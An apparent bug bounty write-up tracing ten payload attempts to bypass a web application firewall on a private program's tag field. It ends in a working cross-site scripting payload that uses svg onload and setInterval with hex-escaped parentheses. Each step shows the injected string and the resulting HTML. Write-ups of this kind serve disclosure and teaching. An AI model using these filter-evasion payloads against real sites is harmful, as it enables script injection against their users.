JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF:

This is a quick write up for a waf bypass on a private bbp, so i will keep hidden the name of the program.

Looking around in the app i found an entry tag feature point which call my attention:

So the app basically load a tag item, i start with this:

### FIRST ATTEMPT:

injection: “=””’><details open=“”>
output is :
<span>”=””’&gt;&lt;details open=””&gt; (0)</span>

Nothing…

### SECOND ATTEMPT

injection: “=””’></><details open=“”>
output is:
<span>”=””’&gt;&lt;/&gt;&lt;details open=””&gt; (0)</span>

Nothing…

### THIRD ATTEMPT:

injection: “=””’></><script></script><details open=“”>
output is :
<span>”=””’&gt;<details open=”…” (0)<=”” span=””><a href=”” class=”” rel=”1"></a></details></span>

bam! we got HTML INJECTION!

NOW … GOING FOR THE PRECIOUS XSS…

#### FOURTH ATTEMPT:

i change the details tag for svg,

injection:“=””’></><script></script><svg onload=alert(1)>
output is :
<span>”=””’&gt;<svg onload=”al…” (1)=””> </svg></span>

strange? yes.. like hell.. with that ugly dots in the DOM too… (tag is working ok like shows above with details tag)

but no popup :(

#### FIFTH ATTEMPT:

injection:“=””’></><script></script><svg onload”=”alert(1)>
output is:
<svg onload”=”… (1)> </span><a href=” “=”” class=”” rel=”1"></svg>

WTF? are you kidding me?

wat?

ok ugly motherfucker… now this is personal..

#### SIXTH ATTEMPT:

injection:“=””’></><script></script><svg onload”=””alertonload=alert(1)””>
output is:
<span>”=””’&gt;<svg onload”=”… (1)” “=””> </svg></span>

ok i give up.. this is not working..

### SEVENTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt(1)>
output is:
onload=”prompt</span”><a href=”” class=”” rel=”0"></a></svg></span>

oh nice shit! i’m closer.. i can feel it..

i can fell your energy.. ak1t4..

#### EIGHTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`1`>
output is :
<svg onload”…=”” (1)””=”” onload=”prompt`1`”> </svg> :)

BOOM! WE GOT XSS!

OK.. NOW TRY WITH document.domain:

#### NINTH ATTEMPT:

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`document.domain`>
output is: <svg onload”…=”” (1)””=”” onload=”prompt`document.domain`”> </svg> :(

WTF? sticky shits are taken the input as string…

mmm IS TIME TO CALL A REAL JEDI : MASTER BRUTE COMES TO RESCUE AND BRINGS BALANCE TO THE FORCE..

So i ask him how inject document.domain over sticky shits `1`;

his reply was:

#### FINAL ATTEMPT with the magic touch of master brute :)

injection:“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=setInterval`alert\x28document.domain\x29`

BOOM BABY!

*THANKS TO MASTER BRUTELOGIC for GUIDE ME TO THE FINAL DESTINY :)

XSS are not my field so i feel like:

May the force be with you — happy hacking :)

P.D: I’m not coder , i hack by common and logical sense. All critics are welcome always for improve. I hope you are enjoyed this lecture as i enjoyed writing.

Like what you read? Give Ak1T4 a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.